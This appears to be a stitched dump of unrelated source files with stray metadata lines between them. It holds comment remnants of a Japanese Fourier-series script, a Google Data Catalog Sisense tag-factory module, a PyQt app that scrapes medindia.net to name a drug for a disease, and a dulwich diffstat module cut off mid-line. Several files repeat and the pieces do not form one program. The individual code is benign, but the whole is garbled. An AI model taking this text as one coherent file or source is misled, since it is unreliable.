#!/usr/bin/env python 音声情報処理 n本ノック !! # MIT License # Copyright (C) 2020 by <NAME> # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # Commentary: # - 矩形波をフーリエ級数近似により作成する # - 近似の様子をアニメーションにより可視化 # Period [s] # Sampling frequency for plot # Duration[s] # # 400 # Angle [rad] # (100, 1) # Order of Fourier Series # (400, 5) # 800 x 800 # Time [s] # (400, ) # (400, ) # (400, 1) # (400, 5) # Fourier coefficients # Saw wav # coef = -PERIOD / (math.pi * ORDER) * numpy.cos(math.pi * ORDER) # Saw wave # phase on the circumference # (400, 5) # unit circle # (2, 5, 5) # plot complex plane k=1 # plot signal k=1 # plot complex plane k = 2 # plot signal k = 2 # plot complex plane k = 3 # plot signal k = 3 # plot complex plane k = 4 # plot signal # plot signal
2.011335
2
google-datacatalog-sisense-connector/src/google/datacatalog_connectors/sisense/prepare/datacatalog_tag_factory.py
anugrah86/datacatalog-connectors-bi
27
6628989
#!/usr/bin/python # # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from datetime import datetime import re from typing import Any, Dict, List, Optional from google.cloud import datacatalog from google.cloud.datacatalog import Tag, TagTemplate from google.datacatalog_connectors.commons import prepare from google.datacatalog_connectors.sisense.prepare import \ constants, sisense_connector_strings_helper class DataCatalogTagFactory(prepare.BaseTagFactory): __INCOMING_TIMESTAMP_UTC_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ' def __init__(self, server_address: str): self.__server_address = server_address def make_tag_for_dashboard(self, tag_template: TagTemplate, dashboard_metadata: Dict[str, Any]) -> Tag: tag = datacatalog.Tag() tag.template = tag_template.name self._set_string_field(tag, 'id', dashboard_metadata.get('oid')) owner = dashboard_metadata.get('ownerData') if owner: self._set_string_field(tag, 'owner_username', owner.get('userName')) first_name = owner.get('firstName') or '' last_name = owner.get('lastName') or '' self._set_string_field(tag, 'owner_name', f'{first_name} {last_name}') folder = dashboard_metadata.get('folderData') if folder: # The root folder's ``oid`` field is not fulfilled. 
folder_id = folder.get('oid') or folder.get('name') self._set_string_field(tag, 'folder_id', folder_id) self._set_string_field(tag, 'folder_name', folder.get('name')) datasource = dashboard_metadata.get('datasource') if datasource: self._set_string_field(tag, 'datasource', datasource.get('title')) last_publish_time = dashboard_metadata.get('lastPublish') if last_publish_time: self._set_timestamp_field( tag, 'last_publish', datetime.strptime(last_publish_time, self.__INCOMING_TIMESTAMP_UTC_FORMAT)) last_opened_time = dashboard_metadata.get('lastOpened') if last_opened_time: self._set_timestamp_field( tag, 'last_opened', datetime.strptime(last_opened_time, self.__INCOMING_TIMESTAMP_UTC_FORMAT)) self._set_string_field(tag, 'server_url', self.__server_address) return tag def make_tags_for_dashboard_filters( self, jaql_tag_template: TagTemplate, dashboard_metadata: Dict[str, Any]) -> List[Tag]: tags = [] filters = dashboard_metadata.get( constants.DASHBOARD_FILTERS_FIELD_NAME) if not filters: return tags for dashboard_filter in filters: tags.extend( self.__make_tags_for_jaql(jaql_tag_template, dashboard_filter.get('jaql'), constants.ENTRY_COLUMN_FILTERS)) return tags def make_tag_for_folder(self, tag_template: TagTemplate, folder_metadata: Dict[str, Any]) -> Tag: tag = datacatalog.Tag() tag.template = tag_template.name # The root folder's ``oid`` field is not fulfilled. 
folder_id = folder_metadata.get('oid') or folder_metadata.get('name') self._set_string_field(tag, 'id', folder_id) parent = folder_metadata.get('parentFolderData') if parent: self._set_string_field(tag, 'parent_id', parent.get('oid')) self._set_string_field(tag, 'parent_name', parent.get('name')) owner = folder_metadata.get('ownerData') if owner: self._set_string_field(tag, 'owner_username', owner.get('userName')) first_name = owner.get('firstName') or '' last_name = owner.get('lastName') or '' self._set_string_field(tag, 'owner_name', f'{first_name} {last_name}') child_folders = folder_metadata.get('folders') child_count = len(child_folders) if child_folders else 0 self._set_bool_field(tag, 'has_children', child_count > 0) if child_count: self._set_double_field(tag, 'child_count', child_count) dashboards = folder_metadata.get('dashboards') dashboard_count = len(dashboards) if dashboards else 0 self._set_bool_field(tag, 'has_dashboards', dashboard_count > 0) if dashboard_count: self._set_double_field(tag, 'dashboard_count', dashboard_count) self._set_string_field(tag, 'server_url', self.__server_address) return tag def make_tag_for_widget(self, tag_template: TagTemplate, widget_metadata: Dict[str, Any]) -> Tag: tag = datacatalog.Tag() tag.template = tag_template.name self._set_string_field(tag, 'id', widget_metadata.get('oid')) self._set_string_field(tag, 'type', widget_metadata.get('type')) self._set_string_field(tag, 'subtype', widget_metadata.get('subtype')) owner = widget_metadata.get('ownerData') if owner: self._set_string_field(tag, 'owner_username', owner.get('userName')) first_name = owner.get('firstName') or '' last_name = owner.get('lastName') or '' self._set_string_field(tag, 'owner_name', f'{first_name} {last_name}') dashboard = widget_metadata.get('dashboardData') self._set_string_field(tag, 'dashboard_id', dashboard.get('oid')) self._set_string_field(tag, 'dashboard_title', dashboard.get('title')) datasource = widget_metadata.get('datasource') if 
isinstance(datasource, dict): self._set_string_field(tag, 'datasource', datasource.get('title')) elif isinstance(datasource, str): self._set_string_field(tag, 'datasource', datasource) self._set_string_field(tag, 'server_url', self.__server_address) return tag def make_tags_for_widget_fields( self, jaql_tag_template: TagTemplate, widget_metadata: Dict[str, Any]) -> List[Tag]: tags = [] if not (widget_metadata.get('metadata') and widget_metadata['metadata'].get('panels')): return tags panels = widget_metadata['metadata']['panels'] fields = [ panel for panel in panels if not panel.get('name') == constants.WIDGET_FILTERS_PANEL_NAME ] if not fields: return tags for field in fields: for item in field.get('items'): tags.extend( self.__make_tags_for_jaql(jaql_tag_template, item.get('jaql'), constants.ENTRY_COLUMN_FIELDS)) return tags def make_tags_for_widget_filters( self, jaql_tag_template: TagTemplate, widget_metadata: Dict[str, Any]) -> List[Tag]: tags = [] if not (widget_metadata.get('metadata') and widget_metadata['metadata'].get('panels')): return tags panels = widget_metadata['metadata']['panels'] filters = next( (panel.get('items') for panel in panels if panel.get('name') == constants.WIDGET_FILTERS_PANEL_NAME), None) if not filters: return tags for widget_filter in filters: tags.extend( self.__make_tags_for_jaql(jaql_tag_template, widget_filter.get('jaql'), constants.ENTRY_COLUMN_FILTERS)) return tags def __make_tags_for_jaql(self, tag_template: TagTemplate, jaql_metadata: Dict[str, Any], column_prefix: str) -> List[Tag]: tags = [] if not jaql_metadata: return tags tag = datacatalog.Tag() tag.template = tag_template.name dim_table = None dim_column = None dimension = jaql_metadata.get('dim') if dimension: self._set_string_field(tag, 'dimension', dimension) # According to the Sisense Support Team, JAQL objects should # contain the ``table`` and ``column`` fields, but we have seen # some cases in which it does not happen -- e.g.: dashboards that # were created a 
long time ago and migrated from version to # version, as well as from platform to platform (Windows to Linux), # have the ``dim`` field, but not ``table`` and ``column``. So, we # decided to scrape table and column metadata from the dimension # when the appropriate fields are not available to avoid losing # relevant lineage information. A regex is used to do so. dim_match = re.search(r'^\[(?P<table>.*)\.(?P<column>.*)]$', dimension) dim_table = dim_match.group('table') dim_column = dim_match.group('column') self._set_string_field(tag, 'table', jaql_metadata.get('table') or dim_table) self._set_string_field(tag, 'column', jaql_metadata.get('column') or dim_column) formula = jaql_metadata.get(constants.JAQL_FORMULA_FIELD_NAME) context = jaql_metadata.get(constants.JAQL_CONTEXT_FIELD_NAME) human_readable_formula = formula # The formula and its fields (aka parts) are stored in distinct fields, # ``formula`` and ``context``. The below code seeks to replace the part # identifiers, usually system-generated strings, with the part titles, # which are human-readable strings. On success, the resulting formula # is equal to what Sisense shows to users in the UI. 
if formula and context: parts = re.findall(r'\[(.*?)]', formula) for part in parts: part_metadata = context.get(f'[{part}]') if not part_metadata: continue part_title = part_metadata.get('title') if part_title: human_readable_formula = human_readable_formula.replace( part, part_title) self._set_string_field(tag, 'formula', human_readable_formula) self._set_string_field(tag, 'aggregation', jaql_metadata.get('agg')) self._set_string_field(tag, 'server_url', self.__server_address) title = jaql_metadata.get('title') subcolumn_name = sisense_connector_strings_helper\ .SisenseConnectorStringsHelper.format_column_name(title) tag.column = f'{column_prefix}.{subcolumn_name}' tags.append(tag) tags.extend( self.__make_tags_for_jaql_formula(tag_template, jaql_metadata, tag.column)) filter_by_tag = self.__make_tag_for_jaql_filter_by( tag_template, jaql_metadata, tag.column) if filter_by_tag: tags.append(filter_by_tag) return tags def __make_tags_for_jaql_formula(self, tag_template: TagTemplate, jaql_metadata: Dict[str, Any], column_prefix: str) -> List[Tag]: tags = [] formula = jaql_metadata.get(constants.JAQL_FORMULA_FIELD_NAME) context = jaql_metadata.get(constants.JAQL_CONTEXT_FIELD_NAME) if not (formula and context): return tags parts = re.findall(r'\[(.*?)]', formula) for part in parts: tags.extend( self.__make_tags_for_jaql( tag_template, context.get(f'[{part}]'), f'{column_prefix}.{constants.ENTRY_COLUMN_FORMULA}')) return tags def __make_tag_for_jaql_filter_by(self, tag_template: TagTemplate, jaql_metadata: Dict[str, Any], column_prefix: str) -> Optional[Tag]: jaql_filter = jaql_metadata.get(constants.JAQL_FILTER_FIELD_NAME) if not jaql_filter: return tags = self.__make_tags_for_jaql( tag_template, jaql_filter.get(constants.JAQL_FILTER_BY_FIELD_NAME), f'{column_prefix}.{constants.ENTRY_COLUMN_FILTER_BY}') return tags[0] if tags else None
#!/usr/bin/python # # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from datetime import datetime import re from typing import Any, Dict, List, Optional from google.cloud import datacatalog from google.cloud.datacatalog import Tag, TagTemplate from google.datacatalog_connectors.commons import prepare from google.datacatalog_connectors.sisense.prepare import \ constants, sisense_connector_strings_helper class DataCatalogTagFactory(prepare.BaseTagFactory): __INCOMING_TIMESTAMP_UTC_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ' def __init__(self, server_address: str): self.__server_address = server_address def make_tag_for_dashboard(self, tag_template: TagTemplate, dashboard_metadata: Dict[str, Any]) -> Tag: tag = datacatalog.Tag() tag.template = tag_template.name self._set_string_field(tag, 'id', dashboard_metadata.get('oid')) owner = dashboard_metadata.get('ownerData') if owner: self._set_string_field(tag, 'owner_username', owner.get('userName')) first_name = owner.get('firstName') or '' last_name = owner.get('lastName') or '' self._set_string_field(tag, 'owner_name', f'{first_name} {last_name}') folder = dashboard_metadata.get('folderData') if folder: # The root folder's ``oid`` field is not fulfilled. 
folder_id = folder.get('oid') or folder.get('name') self._set_string_field(tag, 'folder_id', folder_id) self._set_string_field(tag, 'folder_name', folder.get('name')) datasource = dashboard_metadata.get('datasource') if datasource: self._set_string_field(tag, 'datasource', datasource.get('title')) last_publish_time = dashboard_metadata.get('lastPublish') if last_publish_time: self._set_timestamp_field( tag, 'last_publish', datetime.strptime(last_publish_time, self.__INCOMING_TIMESTAMP_UTC_FORMAT)) last_opened_time = dashboard_metadata.get('lastOpened') if last_opened_time: self._set_timestamp_field( tag, 'last_opened', datetime.strptime(last_opened_time, self.__INCOMING_TIMESTAMP_UTC_FORMAT)) self._set_string_field(tag, 'server_url', self.__server_address) return tag def make_tags_for_dashboard_filters( self, jaql_tag_template: TagTemplate, dashboard_metadata: Dict[str, Any]) -> List[Tag]: tags = [] filters = dashboard_metadata.get( constants.DASHBOARD_FILTERS_FIELD_NAME) if not filters: return tags for dashboard_filter in filters: tags.extend( self.__make_tags_for_jaql(jaql_tag_template, dashboard_filter.get('jaql'), constants.ENTRY_COLUMN_FILTERS)) return tags def make_tag_for_folder(self, tag_template: TagTemplate, folder_metadata: Dict[str, Any]) -> Tag: tag = datacatalog.Tag() tag.template = tag_template.name # The root folder's ``oid`` field is not fulfilled. 
folder_id = folder_metadata.get('oid') or folder_metadata.get('name') self._set_string_field(tag, 'id', folder_id) parent = folder_metadata.get('parentFolderData') if parent: self._set_string_field(tag, 'parent_id', parent.get('oid')) self._set_string_field(tag, 'parent_name', parent.get('name')) owner = folder_metadata.get('ownerData') if owner: self._set_string_field(tag, 'owner_username', owner.get('userName')) first_name = owner.get('firstName') or '' last_name = owner.get('lastName') or '' self._set_string_field(tag, 'owner_name', f'{first_name} {last_name}') child_folders = folder_metadata.get('folders') child_count = len(child_folders) if child_folders else 0 self._set_bool_field(tag, 'has_children', child_count > 0) if child_count: self._set_double_field(tag, 'child_count', child_count) dashboards = folder_metadata.get('dashboards') dashboard_count = len(dashboards) if dashboards else 0 self._set_bool_field(tag, 'has_dashboards', dashboard_count > 0) if dashboard_count: self._set_double_field(tag, 'dashboard_count', dashboard_count) self._set_string_field(tag, 'server_url', self.__server_address) return tag def make_tag_for_widget(self, tag_template: TagTemplate, widget_metadata: Dict[str, Any]) -> Tag: tag = datacatalog.Tag() tag.template = tag_template.name self._set_string_field(tag, 'id', widget_metadata.get('oid')) self._set_string_field(tag, 'type', widget_metadata.get('type')) self._set_string_field(tag, 'subtype', widget_metadata.get('subtype')) owner = widget_metadata.get('ownerData') if owner: self._set_string_field(tag, 'owner_username', owner.get('userName')) first_name = owner.get('firstName') or '' last_name = owner.get('lastName') or '' self._set_string_field(tag, 'owner_name', f'{first_name} {last_name}') dashboard = widget_metadata.get('dashboardData') self._set_string_field(tag, 'dashboard_id', dashboard.get('oid')) self._set_string_field(tag, 'dashboard_title', dashboard.get('title')) datasource = widget_metadata.get('datasource') if 
isinstance(datasource, dict): self._set_string_field(tag, 'datasource', datasource.get('title')) elif isinstance(datasource, str): self._set_string_field(tag, 'datasource', datasource) self._set_string_field(tag, 'server_url', self.__server_address) return tag def make_tags_for_widget_fields( self, jaql_tag_template: TagTemplate, widget_metadata: Dict[str, Any]) -> List[Tag]: tags = [] if not (widget_metadata.get('metadata') and widget_metadata['metadata'].get('panels')): return tags panels = widget_metadata['metadata']['panels'] fields = [ panel for panel in panels if not panel.get('name') == constants.WIDGET_FILTERS_PANEL_NAME ] if not fields: return tags for field in fields: for item in field.get('items'): tags.extend( self.__make_tags_for_jaql(jaql_tag_template, item.get('jaql'), constants.ENTRY_COLUMN_FIELDS)) return tags def make_tags_for_widget_filters( self, jaql_tag_template: TagTemplate, widget_metadata: Dict[str, Any]) -> List[Tag]: tags = [] if not (widget_metadata.get('metadata') and widget_metadata['metadata'].get('panels')): return tags panels = widget_metadata['metadata']['panels'] filters = next( (panel.get('items') for panel in panels if panel.get('name') == constants.WIDGET_FILTERS_PANEL_NAME), None) if not filters: return tags for widget_filter in filters: tags.extend( self.__make_tags_for_jaql(jaql_tag_template, widget_filter.get('jaql'), constants.ENTRY_COLUMN_FILTERS)) return tags def __make_tags_for_jaql(self, tag_template: TagTemplate, jaql_metadata: Dict[str, Any], column_prefix: str) -> List[Tag]: tags = [] if not jaql_metadata: return tags tag = datacatalog.Tag() tag.template = tag_template.name dim_table = None dim_column = None dimension = jaql_metadata.get('dim') if dimension: self._set_string_field(tag, 'dimension', dimension) # According to the Sisense Support Team, JAQL objects should # contain the ``table`` and ``column`` fields, but we have seen # some cases in which it does not happen -- e.g.: dashboards that # were created a 
long time ago and migrated from version to # version, as well as from platform to platform (Windows to Linux), # have the ``dim`` field, but not ``table`` and ``column``. So, we # decided to scrape table and column metadata from the dimension # when the appropriate fields are not available to avoid losing # relevant lineage information. A regex is used to do so. dim_match = re.search(r'^\[(?P<table>.*)\.(?P<column>.*)]$', dimension) dim_table = dim_match.group('table') dim_column = dim_match.group('column') self._set_string_field(tag, 'table', jaql_metadata.get('table') or dim_table) self._set_string_field(tag, 'column', jaql_metadata.get('column') or dim_column) formula = jaql_metadata.get(constants.JAQL_FORMULA_FIELD_NAME) context = jaql_metadata.get(constants.JAQL_CONTEXT_FIELD_NAME) human_readable_formula = formula # The formula and its fields (aka parts) are stored in distinct fields, # ``formula`` and ``context``. The below code seeks to replace the part # identifiers, usually system-generated strings, with the part titles, # which are human-readable strings. On success, the resulting formula # is equal to what Sisense shows to users in the UI. 
if formula and context: parts = re.findall(r'\[(.*?)]', formula) for part in parts: part_metadata = context.get(f'[{part}]') if not part_metadata: continue part_title = part_metadata.get('title') if part_title: human_readable_formula = human_readable_formula.replace( part, part_title) self._set_string_field(tag, 'formula', human_readable_formula) self._set_string_field(tag, 'aggregation', jaql_metadata.get('agg')) self._set_string_field(tag, 'server_url', self.__server_address) title = jaql_metadata.get('title') subcolumn_name = sisense_connector_strings_helper\ .SisenseConnectorStringsHelper.format_column_name(title) tag.column = f'{column_prefix}.{subcolumn_name}' tags.append(tag) tags.extend( self.__make_tags_for_jaql_formula(tag_template, jaql_metadata, tag.column)) filter_by_tag = self.__make_tag_for_jaql_filter_by( tag_template, jaql_metadata, tag.column) if filter_by_tag: tags.append(filter_by_tag) return tags def __make_tags_for_jaql_formula(self, tag_template: TagTemplate, jaql_metadata: Dict[str, Any], column_prefix: str) -> List[Tag]: tags = [] formula = jaql_metadata.get(constants.JAQL_FORMULA_FIELD_NAME) context = jaql_metadata.get(constants.JAQL_CONTEXT_FIELD_NAME) if not (formula and context): return tags parts = re.findall(r'\[(.*?)]', formula) for part in parts: tags.extend( self.__make_tags_for_jaql( tag_template, context.get(f'[{part}]'), f'{column_prefix}.{constants.ENTRY_COLUMN_FORMULA}')) return tags def __make_tag_for_jaql_filter_by(self, tag_template: TagTemplate, jaql_metadata: Dict[str, Any], column_prefix: str) -> Optional[Tag]: jaql_filter = jaql_metadata.get(constants.JAQL_FILTER_FIELD_NAME) if not jaql_filter: return tags = self.__make_tags_for_jaql( tag_template, jaql_filter.get(constants.JAQL_FILTER_BY_FIELD_NAME), f'{column_prefix}.{constants.ENTRY_COLUMN_FILTER_BY}') return tags[0] if tags else None
en
0.904791
#!/usr/bin/python # # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # The root folder's ``oid`` field is not fulfilled. # The root folder's ``oid`` field is not fulfilled. # According to the Sisense Support Team, JAQL objects should # contain the ``table`` and ``column`` fields, but we have seen # some cases in which it does not happen -- e.g.: dashboards that # were created a long time ago and migrated from version to # version, as well as from platform to platform (Windows to Linux), # have the ``dim`` field, but not ``table`` and ``column``. So, we # decided to scrape table and column metadata from the dimension # when the appropriate fields are not available to avoid losing # relevant lineage information. A regex is used to do so. # The formula and its fields (aka parts) are stored in distinct fields, # ``formula`` and ``context``. The below code seeks to replace the part # identifiers, usually system-generated strings, with the part titles, # which are human-readable strings. On success, the resulting formula # is equal to what Sisense shows to users in the UI.
2.002572
2
helpers/drugui.py
teghdeep/Build_It_Up
0
6628990
<filename>helpers/drugui.py<gh_stars>0 from PyQt5 import QtCore, QtGui, QtWidgets from bs4 import BeautifulSoup import requests import html5lib from PyQt5.QtWidgets import QMessageBox class Ui_Drugs(object): def setupUi(self, Drugs): Drugs.setObjectName("Drugs") Drugs.resize(572, 449) font = QtGui.QFont() font.setFamily("Nunito") font.setPointSize(12) font.setBold(False) font.setItalic(False) font.setWeight(9) Drugs.setFont(font) Drugs.setStyleSheet("background-color: rgb(44, 51, 54);\n" "font: 75 12pt \"Nunito\";\n" "color:white;\n" "") self.centralwidget = QtWidgets.QWidget(Drugs) self.centralwidget.setObjectName("centralwidget") self.label = QtWidgets.QLabel(self.centralwidget) self.label.setGeometry(QtCore.QRect(200, 50, 231, 51)) self.label.setStyleSheet("color: cyan;\n" "font: 81 24pt \"Nunito ExtraBold\";") self.label.setObjectName("label") self.label_2 = QtWidgets.QLabel(self.centralwidget) self.label_2.setGeometry(QtCore.QRect(20, 200, 241, 31)) self.label_2.setStyleSheet("font: 81 14pt \"Nunito ExtraBold\";") self.label_2.setObjectName("label_2") self.drugsearch = QtWidgets.QLineEdit(self.centralwidget) self.drugsearch.setGeometry(QtCore.QRect(290, 200, 221, 31)) self.drugsearch.setStyleSheet("background-color: rgb(255, 255, 255);\n" "border-radius:10px;\n" "font: 87 12pt \"Nunito\";\n" "color:black;") self.drugsearch.setObjectName("drugsearch") self.drugres = QtWidgets.QTextBrowser(self.centralwidget) self.drugres.setGeometry(QtCore.QRect(180, 330, 231, 41)) self.drugres.setStyleSheet("background-color: rgb(255, 255, 255);\n" "border-radius:10px;\n" "font: 87 12pt \"Nunito\";\n" "color:black;") self.drugres.setObjectName("drugres") self.drugo = QtWidgets.QPushButton(self.centralwidget) self.drugo.setGeometry(QtCore.QRect(220, 270, 151, 31)) self.drugo.setStyleSheet("border-radius:10px;\n" "background-color: #3CB7A1;\n" "color: white;") self.drugo.setObjectName("drugo") Drugs.setCentralWidget(self.centralwidget) self.retranslateUi(Drugs) 
QtCore.QMetaObject.connectSlotsByName(Drugs) self.drugo.clicked.connect(self.getDrug) def getDrug(self): try: disease = self.drugsearch.text() url = f"https://www.medindia.net/drugs/medical-condition/{disease}.htm" html_content = requests.get(url) soup = BeautifulSoup(html_content.content,"html5lib") main_class = soup.find_all("article")[0] link = main_class.find_all("a") self.drugres.append(str(link[0].getText())) except: msg = QMessageBox() msg.setIcon(QMessageBox.Warning) msg.setText("Zero Input Error") msg.setInformativeText("An error occured") msg.setWindowTitle('Error') msg.exec_() def retranslateUi(self, Drugs): _translate = QtCore.QCoreApplication.translate Drugs.setWindowTitle(_translate("Drugs", "Drugs")) self.label.setText(_translate("Drugs", "Find Drugs")) self.label_2.setText(_translate("Drugs", "Enter disease to find drugs")) self.drugo.setText(_translate("Drugs", "Search")) if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) Drugs = QtWidgets.QMainWindow() ui = Ui_Drugs() ui.setupUi(Drugs) Drugs.show() sys.exit(app.exec_())
<filename>helpers/drugui.py<gh_stars>0 from PyQt5 import QtCore, QtGui, QtWidgets from bs4 import BeautifulSoup import requests import html5lib from PyQt5.QtWidgets import QMessageBox class Ui_Drugs(object): def setupUi(self, Drugs): Drugs.setObjectName("Drugs") Drugs.resize(572, 449) font = QtGui.QFont() font.setFamily("Nunito") font.setPointSize(12) font.setBold(False) font.setItalic(False) font.setWeight(9) Drugs.setFont(font) Drugs.setStyleSheet("background-color: rgb(44, 51, 54);\n" "font: 75 12pt \"Nunito\";\n" "color:white;\n" "") self.centralwidget = QtWidgets.QWidget(Drugs) self.centralwidget.setObjectName("centralwidget") self.label = QtWidgets.QLabel(self.centralwidget) self.label.setGeometry(QtCore.QRect(200, 50, 231, 51)) self.label.setStyleSheet("color: cyan;\n" "font: 81 24pt \"Nunito ExtraBold\";") self.label.setObjectName("label") self.label_2 = QtWidgets.QLabel(self.centralwidget) self.label_2.setGeometry(QtCore.QRect(20, 200, 241, 31)) self.label_2.setStyleSheet("font: 81 14pt \"Nunito ExtraBold\";") self.label_2.setObjectName("label_2") self.drugsearch = QtWidgets.QLineEdit(self.centralwidget) self.drugsearch.setGeometry(QtCore.QRect(290, 200, 221, 31)) self.drugsearch.setStyleSheet("background-color: rgb(255, 255, 255);\n" "border-radius:10px;\n" "font: 87 12pt \"Nunito\";\n" "color:black;") self.drugsearch.setObjectName("drugsearch") self.drugres = QtWidgets.QTextBrowser(self.centralwidget) self.drugres.setGeometry(QtCore.QRect(180, 330, 231, 41)) self.drugres.setStyleSheet("background-color: rgb(255, 255, 255);\n" "border-radius:10px;\n" "font: 87 12pt \"Nunito\";\n" "color:black;") self.drugres.setObjectName("drugres") self.drugo = QtWidgets.QPushButton(self.centralwidget) self.drugo.setGeometry(QtCore.QRect(220, 270, 151, 31)) self.drugo.setStyleSheet("border-radius:10px;\n" "background-color: #3CB7A1;\n" "color: white;") self.drugo.setObjectName("drugo") Drugs.setCentralWidget(self.centralwidget) self.retranslateUi(Drugs) 
QtCore.QMetaObject.connectSlotsByName(Drugs) self.drugo.clicked.connect(self.getDrug) def getDrug(self): try: disease = self.drugsearch.text() url = f"https://www.medindia.net/drugs/medical-condition/{disease}.htm" html_content = requests.get(url) soup = BeautifulSoup(html_content.content,"html5lib") main_class = soup.find_all("article")[0] link = main_class.find_all("a") self.drugres.append(str(link[0].getText())) except: msg = QMessageBox() msg.setIcon(QMessageBox.Warning) msg.setText("Zero Input Error") msg.setInformativeText("An error occured") msg.setWindowTitle('Error') msg.exec_() def retranslateUi(self, Drugs): _translate = QtCore.QCoreApplication.translate Drugs.setWindowTitle(_translate("Drugs", "Drugs")) self.label.setText(_translate("Drugs", "Find Drugs")) self.label_2.setText(_translate("Drugs", "Enter disease to find drugs")) self.drugo.setText(_translate("Drugs", "Search")) if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) Drugs = QtWidgets.QMainWindow() ui = Ui_Drugs() ui.setupUi(Drugs) Drugs.show() sys.exit(app.exec_())
zh
0.453391
#3CB7A1;\n"
2.355406
2
dist/dulwich/contrib/diffstat.py
evandroforks/CrowdAnki
2
6628991
#!/usr/bin/env python # -*- coding: utf-8 -*- # vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab # Copyright (c) 2020 <NAME>, Stratford Ontario Canada # All rights reserved. # # This diffstat code was extracted and heavily modified from: # # https://github.com/techtonik/python-patch # Under the following license: # # Patch utility to apply unified diffs # Brute-force line-by-line non-recursive parsing # # Copyright (c) 2008-2016 <NAME> # Available under the terms of MIT license # # and falls under the exact same MIT license import sys import re # only needs to detect git style diffs as this is for # use with dulwich _git_header_name = re.compile(br'diff --git a/(.*) b/(.*)') _GIT_HEADER_START = b'diff --git a/' _GIT_BINARY_START = b'Binary file' _GIT_RENAMEFROM_START = b'rename from' _GIT_RENAMETO_START = b'rename to' _GIT_CHUNK_START = b'@@' _GIT_ADDED_START = b'+' _GIT_DELETED_START = b'-' _GIT_UNCHANGED_START = b' ' # emulate original full Patch class by just extracting # filename and minimal chunk added/deleted information to # properly interface with diffstat routine def _parse_patch(lines): """An internal routine to parse a git style diff or patch to generate diff stats Args: lines: list of byte strings "lines" from the diff to be parsed Returns: A tuple (names, nametypes, counts) of three lists: names = list of repo relative file paths nametypes - list of booolean values indicating if file is binary (True means binary file) counts = list of tuples of (added, deleted) counts for that file """ names = [] nametypes = [] counts = [] in_patch_chunk = in_git_header = binaryfile = False currentfile = None added = deleted = 0 for line in lines: if line.startswith(_GIT_HEADER_START): if currentfile is not None: names.append(currentfile) nametypes.append(binaryfile) counts.append((added, deleted)) currentfile = _git_header_name.search(line).group(2) binaryfile = False added = deleted = 0 in_git_header = True in_patch_chunk = False elif line.startswith(_GIT_BINARY_START) 
and in_git_header: binaryfile = True in_git_header = False elif line.startswith(_GIT_RENAMEFROM_START) and in_git_header: currentfile = line[12:] elif line.startswith(_GIT_RENAMETO_START) and in_git_header: currentfile += b' => %s' % line[10:] elif line.startswith(_GIT_CHUNK_START) and \ (in_patch_chunk or in_git_header): in_patch_chunk = True in_git_header = False elif line.startswith(_GIT_ADDED_START) and in_patch_chunk: added += 1 elif line.startswith(_GIT_DELETED_START) and in_patch_chunk: deleted += 1 elif not line.startswith(_GIT_UNCHANGED_START) and in_patch_chunk: in_patch_chunk = False # handle end of input if currentfile is not None: names.append(currentfile) nametypes.append(binaryfile) counts.append((added, deleted)) return names, nametypes, counts # note must all done using bytes not string because on linux filenames # may not be encodable even to utf-8 def diffstat(lines, max_width=80): """Generate summary statistics from a git style diff ala (git diff tag1 tag2 --stat) Args: lines: list of byte string "lines" from the diff to be parsed max_width: maximum line length for generating the summary statistics (default 80) Returns: A byte string that lists the changed files with change counts and histogram """ names, nametypes, counts = _parse_patch(lines) insert = [] delete = [] namelen = 0 maxdiff = 0 # max changes for any file used for histogram width calc for i, filename in enumerate(names): i, d = counts[i] insert.append(i) delete.append(d) namelen = max(namelen, len(filename)) maxdiff = max(maxdiff, i+d) output = b'' statlen = len(str(maxdiff)) # stats column width for i, n in enumerate(names): binaryfile = nametypes[i] # %-19s | %-4d %s # note b'%d' % namelen is not supported until Python 3.5 # To convert an int to a format width specifier for byte # strings use str(namelen).encode('ascii') format = b' %-' + str(namelen).encode('ascii') + \ b's | %' + str(statlen).encode('ascii') + b's %s\n' binformat = b' %-' + str(namelen).encode('ascii') + b's | 
